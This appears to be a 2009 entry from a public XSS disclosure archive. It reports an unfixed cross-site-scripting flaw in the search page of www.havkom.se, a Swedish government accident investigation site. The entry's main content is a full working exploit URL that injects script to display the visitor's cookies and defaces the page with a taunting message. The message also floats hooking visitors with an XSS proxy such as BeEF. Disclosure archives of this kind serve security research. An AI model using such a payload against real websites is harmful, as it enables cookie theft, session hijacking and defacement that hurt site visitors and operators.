| 
 
| Security researcher DellNull, has submitted on 15/05/2009 a cross-site-scripting (XSS) vulnerability affecting www.havkom.se, which at the time of submission ranked 7162581 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 11/06/2009. It is currently unfixed.
 If you believe that this security issue has been corrected, please send us an e-mail.
 |  
              | Date submitted: 15/05/2009 | Date published: 11/06/2009 | Fixed? Mail us! | Status:  UNFIXED |  
| Author: DellNull | Domain: www.havkom.se | Category: XSS | Pagerank: 7162581 | 
|---|
 
 
| URL: http://www.havkom.se/textsearch.asp?SearchText=%3CSCRIPT%3E%3C/SCRIPT%3E%3CSCRIPT%3Ealert(%27This%20 is%20a%20cookie%20from%20the%20Swedish%20Accident%20Investigation%20Team!\n%27+document.cookie);%3C/
 SCRIPT%3E%3Ch1%3E%3Cfont%20color=%22red%22%20size=%22+5%22%3EAccident%20Investigation%20Team!%3Cbr%3
 EInvestigate%20this!!!%20,%20see%20%3Ca%20href%20=%27http://xssed.com/search?key=havkom.se%27%3Ehttp
 ://xssed.com/search?key=havkom.se%3C/a%3E%20It%27s%20a%20shame%20that%20a%20government%20authority%2
 0is%20prone%20to%20security%20flaws%20in%20their%20systems!%20What%20if%20someone%20places%20a%20xss
 %20proxy%20hook%20(like%20BeEF)%20here?%20The%20privacy%20for%20swedish%20citizens%20is%20supposed%2
 0to%20be%20protected%20by%20constitutional%20laws.%20So%20live%20by%20the%20law%20or%20die%20by%20th
 e%20law%3Cbr%3E%3Cbr%3E-%20DellNull%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg%20src=%27http://www.kinetics.co.nz
 /SiteCollectionImages/CrashTestDummy.jpg%27%3E%3C/font%3E%3C/script%3E
 |  
| Click here to view the mirror |  
|  |  |